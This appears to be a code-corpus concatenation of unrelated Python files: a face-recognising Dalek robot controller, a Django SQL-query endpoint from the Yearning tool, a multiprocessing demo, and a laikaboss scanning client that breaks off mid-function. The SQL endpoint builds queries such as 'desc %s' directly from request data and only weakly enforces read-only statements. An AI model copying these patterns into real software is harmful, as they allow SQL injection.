RATE = 44100 # recording rate in Hz
MAX = 10000 # minimum volume level for dome lights to illuminate
# These control the three different dalek voices
SPEED_DEFAULT = 175
SPEED_DOWN = 125
AMP_UP = 200
AMP_DEFAULT = 190
AMP_DOWN = 180
PITCH_DEFAULT = 99
PITCH_DOWN = 69
SOX_VOL_UP = 5000
SOX_VOL_DEFAULT = 20
SOX_VOL_DOWN = 10
SOX_PITCH_UP = 50
SOX_PITCH_DEFAULT = 0
SOX_PITCH_DOWN = -25
# Servo Channels
IRIS_SERVO = 4
DOME_LIGHTS = 0
IRIS_LIGHT = 1
# Convenience Servo Values
ON = 1.0
AWAKE = True
ASLEEP = False
OFF = 0.0
STEPS = 100
DURATION = 1.0
SERVO_MAX = 0.8
SERVO_MIN = 0.2
# Vales to control whether dome lights are on or off
VOL_MIN = 400
VOL_MAX = 8000
HEIGHT = 1080 # pixels
WIDTH = 1920 # pixels
RESOLUTION = (WIDTH, HEIGHT)
FRAMERATE = 30
unknown_count = 0 # number of times an unknown face has been seen
unknown_seen = round(time.time())
print("Loading face detection engine...")
model = DetectionEngine("/usr/share/edgetpu/examples/models/"
"ssd_mobilenet_v2_face_quant_postprocess_edgetpu.tflite")
print("Loading face landmark detection engine...")
shape_pred = dlib.shape_predictor("./shape_predictor_5_face_landmarks.dat")
face_ext = FaceDataExtractor()
print("Loading face recognition engine...")
facerec = dlib.face_recognition_model_v1("./dlib_face_recognition_resnet_model_v1.dat")
face_recog = FaceRecognizer()
print("Starting video stream...")
vs = VideoStream(src=0,
usePiCamera = True,
resolution=RESOLUTION,
framerate = FRAMERATE).start()
print("Waiting 5 seconds for camera feed to start...")
time.sleep(5.0) # wait for camera feed to start
print("Opening camera stream...")
def dalek_status(direction):
"""
Opens or closes the dalek eye and lights
Arg:
direction (boolean): True to open, False to close
"""
dalek_servo(IRIS_SERVO, 1-direction)
dalek_light(IRIS_LIGHT, 1-direction)
for pos in range(0, STEPS):
if direction:
value = (float(pos) / float(STEPS))**4
else:
value = (1.0 - (float(pos) / float(STEPS)))**4
dalek_servo(IRIS_SERVO, value)
dalek_light(IRIS_LIGHT, value)
time.sleep(DURATION/STEPS)
dalek_servo(IRIS_SERVO, direction)
dalek_light(IRIS_LIGHT, direction)
def dalek_servo(channel,value):
"""
Changes the servo position of a servo on the Adafruit controller.
Maximum and minumum safe positions are pre-calculated.
Args:
channel (int): the channel number of the servo (range 0-16)
value (float): value between 0.0 and 1.0
"""
value = SERVO_MIN + (value * (SERVO_MAX - SERVO_MIN)) # normalise between MAX and MIN
value = 1.0 - value # reverse value
value = value + 1.0 # change to range 1.2 to 1.8
duty_cycle = int(value / (PERIOD / 65535.0))
pca.channels[channel].duty_cycle = duty_cycle
def dalek_light(channel,value):
"""
Changes the level of illumination of a light attached to the
PWM output of the servo controller.
Args:
channel (int): the channel number of the servo (range 0-16)
value (float): value between 0.0 and 1.0
"""
pca.channels[channel].duty_cycle = int(value * 65535.0)
class Person:
'''The Person class represents the people known to the Dalek'''
def __init__(self, name):
'''The attributes are mostly about when the Dalek last saw them
Attributes
----------
name : str
the name of the person
detected: int
time of last detection event
detection_events: int
number of detection events within EVENT_GAP
last_seen: int
last time Dalek greeted that person
Methods
-------
just_seen :
records a sighting of the person by the robot
'''
self.name = name
self.detection_events = 0 # number of detection events at init is zero
self.detected = 0 # time of last know detection event
self.last_seen = 0 # time of last announcement
self.now = 0
self.duration = 0
self.gap = 0
def just_seen(self):
'''Record sighting of person'''
self.now = round(time.time()) # record the time of the detection event
self.duration = self.now - self.last_seen # work out how long since last greeting
print("Just seen " + str(self.name) + " after " + str(self.duration) + "s")
if self.duration > DEAD_TIME: # tests if an announcment is allowed
self.gap = self.now - self.detected # gap = how long since last sighting
self.detected = self.now # record the time of the sighting
self.detection_events += 1 # increment the sightings counter
print("Seen " + str(self.name) +
" " + str(self.detection_events) +
" times. Last time " + str(self.gap) +
"s ago")
if self.gap < EVENT_GAP: # is the gap shorter than the allowed gap?
if self.detection_events >= THRESHOLD: # has the threshold been met?
print("I have seen " + self.name +
" too many times for it to be a false postive.")
# as we are outside the dead time and the threshold has
# been met, then we make an annoucement by
# upadating the Cloudant db with the current time,
# resetting the detection events counter to zero and
# initiating the dalek greeting
self.last_seen = self.now
self.detection_events = 0
dalek_greeting(self.name)
dalek.on_event("greet")
else:
print("Back to watching, detection events for " +
str(self.name) +
" stands at " +
str(self.detection_events))
return
else:
# as the event is outside the window, but a sighting
# has happened then reset the counter to 1
self.detection_events = 1
print("Reset counter. Detection events for " +
str(self.name) +
" is set to " +
str(self.detection_events))
return
else:
print("I've seen " + str(self.name) + ", but recently shouted at them.")
return
class State(object):
'''
State parent class to support standard Python functions
'''
def __init__(self):
print('Entering state:', str(self))
def on_event(self, event):
'''
Incoming events processing is delegated to the child State
to define and enable the valid state transitions.
'''
def run(self):
'''
Enable the state to do something - this is usually delegated
to the child States)
'''
print('Run event for ' + str(self) + ' state not implemented')
def __repr__(self):
'''
Leverages the __str__ method to describe the State.
'''
return self.__str__()
def __str__(self):
'''
Returns the name of the State.
'''
return self.__class__.__name__
# Start Dalek states
class Waiting(State):
'''
The child state where the Dalek is scanning for faces, but appears dormant
'''
def __init__(self):
super(Waiting, self).__init__()
def run(self):
faces = detect_faces()
if len(faces) > 0:
dalek.on_event('face_detected')
def on_event(self, event):
if event == 'silent':
return Silent()
if event == 'face_detected':
return WakingUp()
return self
class Silent(State):
'''
The child state where the Dalek does not react without a new signal
from the Bangle.js watch
'''
def __init__(self):
super(Silent, self).__init__()
def run(self):
time.sleep(0.1)
def on_event(self, event):
if event == 'waiting':
return Waiting()
return self
class WakingUp(State):
'''
The child state where the Dalek wakes up by turning its lights on and
openning its Iris
'''
def __init__(self):
super(WakingUp, self).__init__()
dalek_status(AWAKE)
def run(self):
dalek.on_event('dalek_awake')
def on_event(self, event):
if event == 'dalek_awake':
return Awake()
return self
class Awake(State):
'''
The child state where the Dalek searches for a recognizable face
'''
def __init__(self):
super(Awake, self).__init__()
self.now = round(time.time())
def run(self):
countdown = DEAD_TIME + self.now - round(time.time())
if countdown <= 0:
dalek.on_event('timeout')
else:
print("Countdown timer:" + str(countdown))
face_names = recognise_faces()
if len(face_names) > 0:
self.now = round(time.time())
for name in face_names:
if name == "Unknown":
dalek.on_event("exterminate")
else:
dalek_greeting(name)
dalek.on_event("greet")
def on_event(self, event):
if event == 'timeout':
return FallingAsleep()
if event == 'greet':
return Greeting()
if event == 'exterminate':
return Exterminating()
return self
class Greeting(State):
'''
The child state where the Dalek says goodbye to a known person
'''
def run(self):
dalek.on_event('greet_done')
def on_event(self, event):
if event == 'greet_done':
return Awake()
return self
class Exterminating(State):
'''
The child state where the Dalek exterminates someone it doesn't know
'''
def __init__(self):
super(Exterminating, self).__init__()
self.now = round(time.time())
self.unknown_count = 0
def run(self):
countdown = DEAD_TIME + self.now - round(time.time())
if countdown <= 0:
dalek.on_event('timeout')
else:
print("Countdown: " + str(countdown))
face_names = recognise_faces()
if len(face_names) > 0:
self.now = round(time.time())
for face in face_names:
if face == "Unknown":
self.unknown_count += 1
else:
self.unknown_count = 0
dalek.on_event("known_face")
if self.unknown_count < UNKNOWN_THRESHOLD:
print("Exterminating: unknown count - " + str(unknown_count))
else:
warning = ("You are|>unrecognized. Do not|>move!",
">Halt|You are an|>enemy|of the|<Darleks.",
"You are|>unknown|<You will|be|>exterminated!",
"Intruder|>alert!",
"<Enemy|detected!|>Exterminate!",
"Halt. Do not|<move.|You will|>obey!",
"Obey the Darleks!|>Obey the Darleks!",
"Unknown human|<in hall|>Exterminate!",
"Do not|>move.|You will be|>exterminated!",
"Warning|>Warning|Do not move!")
response = random_msg(warning)
self.unknown_count = 0
dalek_speak(response)
dalek.on_event('death')
def on_event(self, event):
if event == 'death':
return Awake()
if event == 'timeout':
return Awake()
if event == 'known_face':
return Awake()
return self
class FallingAsleep(State):
'''
The child state where the Dalek returns to dormant state
'''
def __init__(self):
super(FallingAsleep, self).__init__()
dalek_status(ASLEEP)
def run(self):
dalek.on_event('asleep')
def on_event(self, event):
if event == 'asleep':
return Waiting()
return self
# End Dalek states.
class Dalek(object):
'''
A Dalek finite state machine that starts in waiting state and
will transition to a new state on when a transition event occurs.
It also supports a run command to enable each state to have its
own specific behaviours
'''
def __init__(self):
''' Initialise the Dalek in its Waiting state. '''
# Start with a default state.
dalek_status(AWAKE)
dalek_speak("I am Darlek Fry!")
dalek_status(ASLEEP)
self.state = Waiting()
def run(self):
''' State behavior is delegated to the current state'''
self.state.run()
def on_event(self, event):
'''
Incoming events are delegated to the current state, which then
returns the next valid state.
'''
# The next state will be the result of the on_event function.
self.state = self.state.on_event(event)
def detect_faces():
'''
Takes a video frame and detects whether there is a face in the picture
using the Coral TPU.
This is much quicker than identifying the face, so it used to wake up
the dalek. This makes the recognition seem much more immediate.
'''
cam_frame = vs.read()
np_frame = cv2.cvtColor(cam_frame, cv2.COLOR_BGR2RGB)
img_frame = Image.fromarray(np_frame)
face_box_list = model.detect_with_image(img_frame,
threshold = 0.9,
keep_aspect_ratio = True,
relative_coord = False,
top_k = 1)
return face_box_list
def recognise_faces():
'''
Grabs a video frame and detects whether there are faces in the video image
if there are, it attempts to identify them, returning a list of names, or
unknown if someone unknown is in the image
'''
cam_frame = vs.read()
np_frame = cv2.cvtColor(cam_frame, cv2.COLOR_BGR2RGB)
img_frame = Image.fromarray(np_frame)
face_box_list = model.detect_with_image(img_frame,
threshold = 0.7,
keep_aspect_ratio = True,
relative_coord = False,
top_k = 3)
face_names = []
face_box_list = detect_faces()
for face_box in face_box_list:
face_data = face_ext.extract_data(face = face_box, np_frame = np_frame)
if face_data:
face_box = face_box.bounding_box.flatten().astype("int")
(start_x, start_y, end_x, end_y) = face_box
box = dlib.rectangle(left = start_x,
right = end_x,
top = start_y,
bottom = end_y)
shape = shape_pred(np_frame, box)
if shape:
face_chip_img = dlib.get_face_chip(np_frame, shape)
face_descriptor = facerec.compute_face_descriptor(face_chip_img)
name = face_recog.recognize_face(face_descriptor, threshold = 0.7)
face_names.append(name)
return face_names
def dalek_speak(speech):
'''
Break speech up into clauses and speak each one with
various pitches, volumes and distortions
to make the voice more Dalek like
'''
clauses = speech.split("|")
for clause in clauses:
if clause and not clause.isspace():
if clause[:1] == ">":
clause = clause[1:]
pitch = PITCH_DEFAULT
speed = SPEED_DOWN
amplitude = AMP_UP
sox_vol = SOX_VOL_UP
sox_pitch = SOX_PITCH_UP
elif clause[:1] == "<":
clause = clause[1:]
pitch = PITCH_DOWN
speed = SPEED_DOWN
amplitude = AMP_DOWN
sox_vol = SOX_VOL_DOWN
sox_pitch = SOX_PITCH_DOWN
else:
pitch = PITCH_DEFAULT
speed = SPEED_DEFAULT
amplitude = AMP_DEFAULT
sox_vol = SOX_VOL_DEFAULT
sox_pitch = SOX_PITCH_DEFAULT
print(clause)
cmd = ("espeak -v en-rp '%s' -p %s -s %s -a %s -z "
"--stdout|play -v %s - synth sine fmod 25 pitch %s" %
(clause, pitch, speed, amplitude, sox_vol, sox_pitch))
os.system(cmd)
def random_msg(phrase_dict):
'''Choose a random phrase from a list'''
length = len(phrase_dict)
index = random.randint(0, length-1)
message = phrase_dict[index]
return message
def dalek_greeting(name):
'''Dalek will issue an appropriate greeting depending upon context'''
greeting = ("Have a|>nice|day|>name",
"Hello name, you are a|>friend|of the|<Darleks",
"Greetings name",
"Hello name",
"name is recognized",
"name is in the hall")
response = random_msg(greeting)
response = response.replace('name', name)
print(response)
dalek_speak(response)
return
# Sets up a daemon thread to flash lights in line with sound
def flash_dome_lights():
''' Daemon thread to flash lights based on microphone noise '''
while True:
try:
data = np.frombuffer(stream.read(CHUNK, False),dtype=np.int16)
vol = abs(int(np.average(np.abs(data))))
print(vol)
if vol > VOL_MIN:
vol = min(1.0, vol/VOL_MAX)
dalek_light(DOME_LIGHTS, vol)
else:
dalek_light(DOME_LIGHTS, 0)
except ValueError:
print ("Volume out of range: " + vol)
# start the background thread to flash the Dome Lights
p = pyaudio.PyAudio()
stream=p.open(format=pyaudio.paInt16,channels=1,rate=RATE,input=True,
frames_per_buffer=CHUNK, input_device_index=2)
domeLightsThread = Thread(target=flash_dome_lights, daemon=True)
domeLightsThread.start()
dalek = Dalek()
last_message = ""
client = mqtt.Client("dalek-python")
client.connect("localhost")
# client.publish("test/message","did you get this?")
def on_message(message):
"""
Enables the Dalek to receive a message from an Epruino Watch via
MQTT over Bluetooth (BLE) to place it into active or inactive States
"""
global last_message
payload = str(message.payload.decode("utf-8"))
if payload != last_message:
last_message = payload
payload = payload.replace('"', "")
command = payload.split(",")
print(command)
if command[1] == "Dale" and command[2] == "face" and command[3] == "on":
dalek.on_event('waiting')
if command[1] == "Dale" and command[2] == "face" and command[3] == "off":
dalek.on_event('silent')
else:
dalek.on_event('unknown')
client.on_message = on_message # attach function to callback
client.subscribe("/ble/advertise/d3:fe:97:d2:d1:9e/espruino/#")
try:
while True:
dalek.run()
time.sleep(0.1)
client.loop(0.1)
except KeyboardInterrupt:
pca.deinit()
stream.stop_stream()
stream.close()
p.terminate()
client.loop_stop()
print("Dalek stopped by user.")
|
serachsql.py
|
import json
import logging
import time
import re
import threading
import configparser
from django.db.models import Count
from libs import util
from rest_framework.response import Response
from libs.serializers import Query_review, Query_list
from libs import baseview, send_email
from libs import con_database
from core.models import DatabaseList, Account, querypermissions, query_order
CUSTOM_ERROR = logging.getLogger('Yearning.core.views')
conf = util.conf_path()
CONF = configparser.ConfigParser()
CONF.read('deploy.conf')
WEBHOOK = CONF.get('webhook', 'dingding')
class search(baseview.BaseView):
'''
:argument sql查询接口, 过滤非查询语句并返回查询结果。
可以自由limit数目 当limit数目超过配置文件规定的最大数目时将会采用配置文件的最大数目
'''
def post(self, request, args=None):
sql = request.data['sql']
check = str(sql).strip().split(';\n')
user = query_order.objects.filter(username=request.user).order_by('-id').first()
if user.query_per == 1:
if check[-1].strip().lower().startswith('s') != 1:
return Response({'error': '只支持查询功能或删除不必要的空白行!'})
else:
address = json.loads(request.data['address'])
_c = DatabaseList.objects.filter(
connection_name=user.connection_name,
computer_room=user.computer_room
).first()
try:
with con_database.SQLgo(
ip=_c.ip,
password=_c.password,
user=_c.username,
port=_c.port,
db=address['basename']
) as f:
query_sql = replace_limit(check[-1].strip(), conf.limit)
data_set = f.search(sql=query_sql)
querypermissions.objects.create(
work_id=user.work_id,
username=request.user,
statements=query_sql
)
return Response(data_set)
except Exception as e:
CUSTOM_ERROR.error(f'{e.__class__.__name__}: {e}')
return Response({'error': '查询失败,请查看错误日志定位具体问题'})
else:
return Response({'error': '已超过申请时限请刷新页面后重新提交申请'})
def put(self, request, args: str = None):
base = request.data['base']
table = request.data['table']
query_per = query_order.objects.filter(username=request.user).order_by('-id').first()
if query_per.query_per == 1:
_c = DatabaseList.objects.filter(
connection_name=query_per.connection_name,
computer_room=query_per.computer_room
).first()
try:
with con_database.SQLgo(
ip=_c.ip,
password=_c.password,
user=_c.username,
port=_c.port,
db=base
) as f:
data_set = f.search(sql='desc %s'%table)
return Response(data_set)
except:
return Response('')
else:
return Response({'error': '已超过申请时限请刷新页面后重新提交申请'})
def replace_limit(sql, limit):
'''
:argument 根据正则匹配分析输入信息 当limit数目超过配置文件规定的最大数目时将会采用配置文件的最大数目
'''
if sql[-1] != ';':
sql += ';'
if sql.startswith('show') == -1:
return sql
sql_re = re.search(r'limit\s.*\d.*;',sql.lower())
length = ''
if sql_re is not None:
c = re.search(r'\d.*', sql_re.group())
if c is not None:
if c.group().find(',') != -1:
length = c.group()[-2]
else:
length = c.group().rstrip(';')
if int(length) <= int(limit):
return sql
else:
sql = re.sub(r'limit\s.*\d.*;', 'limit %s;' % limit, sql)
return sql
else:
sql = sql.rstrip(';') + ' limit %s;'%limit
return sql
class query_worklf(baseview.BaseView):
@staticmethod
def query_callback(timer, work_id):
query_order.objects.filter(work_id=work_id).update(query_per=1)
try:
time.sleep(int(timer) * 60)
except:
time.sleep(60)
finally:
query_order.objects.filter(work_id=work_id).update(query_per=3)
def get(self, request, args: str = None):
page = request.GET.get('page')
page_number = query_order.objects.aggregate(alter_number=Count('id'))
start = int(page) * 10 - 10
end = int(page) * 10
info = query_order.objects.all().order_by('-id')[start:end]
serializers = Query_review(info, many=True)
return Response({'page': page_number, 'data': serializers.data})
def post(self, request, args: str = None):
work_id = request.data['workid']
user = request.data['user']
data = querypermissions.objects.filter(work_id=work_id,username=user).all().order_by('-id')
serializers = Query_list(data, many=True)
return Response(serializers.data)
def put(self, request, args: str = None):
if request.data['mode'] == 'put':
instructions = request.data['instructions']
connection_name = request.data['connection_name']
computer_room = request.data['computer_room']
timer = request.data['timer']
export = request.data['export']
audit = request.data['audit']
work_id = util.workId()
try:
timer = int(timer)
query_order.objects.create(
work_id=work_id,
instructions=instructions,
username=request.user,
timer=timer,
date=util.date(),
query_per=2,
connection_name=connection_name,
computer_room=computer_room,
export= export,
audit=audit,
time=util.date()
)
except:
query_order.objects.create(
work_id=work_id,
instructions=instructions,
username=request.user,
timer=1,
date=util.date(),
query_per=2,
connection_name=connection_name,
computer_room=computer_room,
export=export,
audit=audit,
time=util.date()
)
userinfo = Account.objects.filter(username=audit, group='admin').first()
thread = threading.Thread(target=push_message, args=({'to_user': request.user, 'workid': work_id}, 5, request.user, userinfo.email, work_id, '提交'))
thread.start()
## 钉钉及email站内信推送
return Response('查询工单已提交,等待管理员审核!')
elif request.data['mode'] == 'agree':
work_id = request.data['work_id']
query_info = query_order.objects.filter(work_id=work_id).order_by('-id').first()
t = threading.Thread(target=query_worklf.query_callback, args=(query_info.timer, work_id))
userinfo = Account.objects.filter(username=query_info.username).first()
thread = threading.Thread(target=push_message, args=({'to_user': query_info.username, 'workid': query_info.work_id}, 6, query_info.username, userinfo.email, work_id, '同意'))
t.start()
thread.start()
return Response('查询工单状态已更新!')
elif request.data['mode'] == 'disagree':
work_id = request.data['work_id']
query_order.objects.filter(work_id=work_id).update(query_per=0)
query_info = query_order.objects.filter(work_id=work_id).order_by('-id').first()
userinfo = Account.objects.filter(username=query_info.username).first()
thread = threading.Thread(target=push_message, args=({'to_user': query_info.username, 'workid': query_info.work_id}, 7, query_info.username, userinfo.email,work_id, '驳回'))
thread.start()
return Response('查询工单状态已更新!')
elif request.data['mode'] == 'status':
status = query_order.objects.filter(username=request.user).order_by('-id').first()
try:
return Response(status.query_per)
except:
return Response(0)
elif request.data['mode'] == 'info':
tablelist = []
database = query_order.objects.filter(username=request.user).order_by('-id').first()
_connection = DatabaseList.objects.filter(connection_name=database.connection_name).first()
with con_database.SQLgo(ip=_connection.ip,
user=_connection.username,
password=_connection.password,
port=_connection.port) as f:
dataname = f.query_info(sql='show databases')
children = []
ignore = ['information_schema', 'sys', 'performance_schema', 'mysql']
for index,uc in enumerate(dataname):
for cc in ignore:
if uc['Database'] == cc:
del dataname[index]
index = index - 1
for i in dataname:
with con_database.SQLgo(ip=_connection.ip,
user=_connection.username,
password=_connection.password,
port=_connection.port,
db=i['Database']) as f:
tablename = f.query_info(sql='show tables')
for c in tablename:
key = 'Tables_in_%s'%i['Database']
children.append({
'title': c[key]
})
tablelist.append({
'title': i['Database'],
'children': children
})
children = []
data = [{
'title': database.connection_name,
'expand': 'true',
'children': tablelist
}]
return Response({'info':json.dumps(data),'status': database.export})
def delete(self, request, args: str = None):
data = query_order.objects.filter(username=request.user).order_by('-id').first()
query_order.objects.filter(work_id=data.work_id).delete()
return Response('')
def push_message(message=None, type=None, user=None, to_addr=None, work_id=None, status=None):
try:
put_mess = send_email.send_email(to_addr=to_addr)
put_mess.send_mail(mail_data=message, type=type)
except Exception as e:
CUSTOM_ERROR.error(f'{e.__class__.__name__}: {e}')
else:
try:
util.dingding(content='查询申请通知\n工单编号:%s\n发起人:%s\n状态:%s' % (work_id, user, status), url=WEBHOOK)
except ValueError as e:
CUSTOM_ERROR.error(f'{e.__class__.__name__}: {e}')
class Query_order(baseview.SuperUserpermissions):
def get(self, request, args: str = None):
page = request.GET.get('page')
pn = query_order.objects.filter(audit=request.user).all().values('id')
pn.query.distinct = ['id']
start = int(page) * 10 - 10
end = int(page) * 10
user_list = query_order.objects.all().order_by('-id')[start:end]
serializers = Query_review(user_list, many=True)
return Response({'data': serializers.data, 'pn': len(pn)})
def post(self, request, args: str = None):
work_id_list = json.loads(request.data['work_id'])
for i in work_id_list:
query_order.objects.filter(work_id=i).delete()
return Response('申请记录已删除!')
|
consumer_producer.py
|
import time
import random
from multiprocessing import Queue,Process
def consumer(name,q):
while True:
res=q.get()
time.sleep(random.randint(1,3))
print('消费者》》%s 准备开吃%s。'%(name,res))
def producer(name,q):
for i in range(5):
time.sleep(random.randint(1,2))
res='大虾%s'%i
q.put(res)
print('生产者》》》%s 生产了%s'%(name,res))
if __name__ == '__main__':
q=Queue()#一个队列
p1=Process(target=producer,args=('monicx',q))
c1=Process(target=consumer,args=('lili',q))
p1.start()
c1.start()
|
cloudscan.py
|
#!/usr/bin/env python
# Copyright 2015 Lockheed Martin Corporation
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# A networked client for the laikaboss framework.
# Must have an instance of laikad running locally or on a server
# accessible by this client over ssh.
#
# This client is based on the ZeroMQ Lazy Pirate pattern
#
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from multiprocessing import Process, Queue
import os, sys, time, logging, select
import getpass
from socket import gethostname
from optparse import OptionParser
from laikaboss.lbconfigparser import LBConfigParser
import pickle as pickle
from laikaboss.objectmodel import ExternalObject, ExternalVars
from laikaboss.constants import level_minimal, level_metadata, level_full
from laikaboss.clientLib import Client, getRootObject, get_scanObjectUID, \
getJSON
from random import randint
import json
from copy import deepcopy as clone_object
from distutils.util import strtobool
job_queue = Queue()
result_queue = Queue()
failed_queue = Queue()
# Variable to store configs from file
configs = {}
# Defaults for all available configurations
# To be used if not specified on command line or config file
default_configs = {
'use_ssh': 'False',
'broker_host': 'tcp://localhost:5558',
'ssh_host': 'localhost',
'request_timeout': '600000',
'request_retries': '1',
'return_level': 'metadata',
'num_procs': '8',
}
def getConfig(option):
value = ''
if option in configs:
value = configs[option]
else:
value = default_configs[option]
return value
def main():
parser = OptionParser(usage="usage: %prog [options] (/path/to/file | stdin)")
parser.add_option("-d", "--debug",
action="store_true",
dest="debug",
help="enable debug messages to the console.")
parser.add_option("-r", "--remove-limit",
action="store_true",
dest="nolimit",
help="disable 20mb size limit (be careful!)")
parser.add_option("-t", "--timeout",
action="store", type="int",
dest="timeout",
help="adjust request timeout period (in seconds)")
parser.add_option("-c", "--config-path",
action="store", type="string",
dest="config_path",
help="specify a path to cloudscan.conf.")
parser.add_option("-a", "--address",
action="store", type="string",
dest="broker_host",
help="specify an IP and port to connect to the broker")
parser.add_option("-f", "--file-list",
action="store", type="string",
dest="file_list",
help="Specify a list of files to scan")
parser.add_option("-s", "--ssh-host",
action="store", type="string",
dest="ssh_host",
help="specify a host for the SSH tunnel")
parser.add_option("-p", "--num-procs",
action="store", type="int", default=6,
dest="num_procs",
help="Specify the number of processors to use for recursion")
parser.add_option("-u", "--source",
action="store", type="string",
dest="source",
help="specify a custom source")
parser.add_option("--ssh",
action="store_true",
default=False,
dest="use_ssh",
help="Use SSH tunneling")
parser.add_option("-l", "--level",
action="store", type="string",
dest="return_level",
help="Return Level: minimal, metadata, full [default: metadata]")
parser.add_option("-o", "--out-path",
action="store", type="string",
dest="save_path",
help="If Return Level Full has been specified, provide a path to "
"save the results to [default: current directory]")
parser.add_option("-b", "--buffer",
action="store_true",
dest="stdin_buffer",
help="Specify to allow a buffer to be collected by stdin.")
parser.add_option("-e", "--ephID",
action="store", type="string",
dest="ephID", default="",
help="Specify an ephID to send to Laika.")
parser.add_option("-m", "--ext-metadata",
action="store",
dest="ext_metadata",
help="Specify external metadata to be passed into the scanner.")
parser.add_option("-z", "--log",
action="store_true",
dest="log_db",
help="Specify to turn on logging results.")
parser.add_option("-R", "--recursive",
action="store_true",
default=False,
dest="recursive",
help="Enable recursive directory scanning. If enabled, all files "
"in the specified directory will be scanned. Results will "
"be output to cloudscan.log in the current directory.")
(options, args) = parser.parse_args()
# Define default configuration location
CONFIG_PATH = "/etc/laikaboss/cloudscan.conf"
if options.config_path:
CONFIG_PATH = options.config_path
Config = LBConfigParser()
Config.read(CONFIG_PATH)
# Parse through the config file and append each section to a single dictionary
global configs
for section in Config.sections():
configs.update(dict(Config.items(section)))
# Set the working path, this will be used for file ouput if another
# path is not specified
WORKING_PATH = os.getcwd()
if options.use_ssh:
USE_SSH = True
else:
if strtobool(getConfig('use_ssh')):
USE_SSH = True
else:
USE_SSH = False
if options.ssh_host:
SSH_HOST = options.ssh_host
else:
SSH_HOST = getConfig('ssh_host')
if options.broker_host:
BROKER_HOST = options.broker_host
else:
BROKER_HOST = getConfig('broker_host')
if options.debug:
logging.basicConfig(level=logging.DEBUG)
logging.debug("Host: %s" % BROKER_HOST)
if options.return_level:
RETURN_LEVEL = options.return_level
else:
RETURN_LEVEL = getConfig('return_level')
if options.source:
SOURCE = options.source
else:
SOURCE = "cloudscan"
if not options.log_db:
SOURCE += "-nolog"
if options.save_path:
SAVE_PATH = options.save_path
else:
SAVE_PATH = WORKING_PATH
if options.num_procs:
num_procs = int(options.num_procs)
else:
num_procs = int(getConfig('num_procs'))
if options.timeout:
logging.debug("default timeout changed to %i" % options.timeout)
REQUEST_TIMEOUT = options.timeout * 1000
else:
REQUEST_TIMEOUT = int(getConfig('request_timeout'))
if options.ext_metadata:
try:
if os.path.exists(options.ext_metadata):
with open(options.ext_metadata) as metafile:
ext_metadata = json.loads(metafile.read())
else:
ext_metadata = json.loads(options.ext_metadata)
assert isinstance(ext_metadata, dict)
except:
print("External Metadata must be a dictionary!")
sys.exit(0)
else:
ext_metadata = dict()
REQUEST_RETRIES = int(getConfig('request_retries'))
# Attempt to get the hostname
try:
hostname = gethostname().split('.')[0]
except:
hostname = "none"
# Attempt to set the return level, throw an error if it doesn't exist.
try:
return_level = globals()["level_%s" % RETURN_LEVEL]
except KeyError as e:
print("Please specify a valid return level: minimal, metadata or full")
sys.exit(1)
if not options.recursive:
try:
file_buffer = ''
# Try to read the file
if len(args) > 0:
file_buffer = open(args[0], 'rb').read()
file_len = len(file_buffer)
logging.debug("opened file %s with len %i" % (args[0], file_len))
else:
while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
line = sys.stdin.readline()
if not line:
break
else:
file_buffer += line
if not file_buffer:
parser.print_usage()
sys.exit(1)
file_len = len(file_buffer)
if file_len > 20971520 and not options.nolimit:
print("You're trying to scan a file larger than 20mb.. Are you sure?")
print("Use the --remove-limit flag if you really want to do this.")
sys.exit(1)
except IOError as e:
print("\nERROR: The file does not exist: %s\n" % (args[0],))
sys.exit(1)
else:
try:
fileList = []
if options.file_list:
fileList = open(options.file_list).read().splitlines()
else:
if len(args) > 0:
rootdir = args[0]
for root, subFolders, files in os.walk(rootdir):
for fname in files:
fileList.append(os.path.join(root, fname))
else:
while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
line = sys.stdin.readline()
if not line:
break
else:
fileList.append(line)
if not fileList:
parser.print_usage()
sys.exit(1)
if len(fileList) > 1000 and not options.nolimit:
print("You're trying to scan over 1000 files... Are you sure?")
print("Use the --remove-limit flag if you really want to do this.")
sys.exit(1)
except IOError as e:
print("\nERROR: Directory does not exist: %s\n" % (args[0],))
sys.exit(1)
if not options.recursive:
# Construct the object to be sent for scanning
if args:
filename = args[0]
else:
filename = "stdin"
ext_metadata['server'] = hostname
ext_metadata['user'] = getpass.getuser()
externalObject = ExternalObject(buffer=file_buffer,
externalVars=ExternalVars(filename=filename,
ephID=options.ephID,
extMetaData=ext_metadata,
source="%s-%s-%s" % (SOURCE,
hostname,
getpass.getuser())),
level=return_level)
try:
if not options.recursive:
# Set up ZMQ context
if USE_SSH:
try:
logging.debug("attempting to connect to broker at %s and SSH host %s" % (BROKER_HOST, SSH_HOST))
client = Client(BROKER_HOST, useSSH=True, sshHost=SSH_HOST, useGevent=True)
except RuntimeError as e:
logging.exception("could not set up SSH tunnel to %s" % SSH_HOST)
sys.exit(1)
else:
logging.debug("SSH has been disabled.")
client = Client(BROKER_HOST, useGevent=True)
starttime = time.time()
result = client.send(externalObject, retry=REQUEST_RETRIES, timeout=REQUEST_TIMEOUT)
logging.debug("got reply in %s seconds" % str(time.time() - starttime))
if result:
rootObject = getRootObject(result)
try:
jsonResult = getJSON(result)
print(jsonResult)
except:
logging.exception("error occured collecting results")
return
if return_level == level_full:
SAVE_PATH = "%s/%s" % (SAVE_PATH, get_scanObjectUID(rootObject))
if not os.path.exists(SAVE_PATH):
try:
os.makedirs(SAVE_PATH)
print("\nWriting results to %s...\n" % SAVE_PATH)
except (OSError, IOError) as e:
print("\nERROR: unable to write to %s...\n" % SAVE_PATH)
return
else:
print("\nOutput folder already exists! Skipping results output...\n")
return
for uid, scanObject in result.files.items():
f = open("%s/%s" % (SAVE_PATH, uid), "wb")
f.write(scanObject.buffer)
f.close()
try:
if scanObject.filename and scanObject.parent:
linkPath = "%s/%s" % (SAVE_PATH, scanObject.filename.replace("/","_"))
if not os.path.lexists(linkPath):
os.symlink("%s" % (uid), linkPath)
elif scanObject.filename:
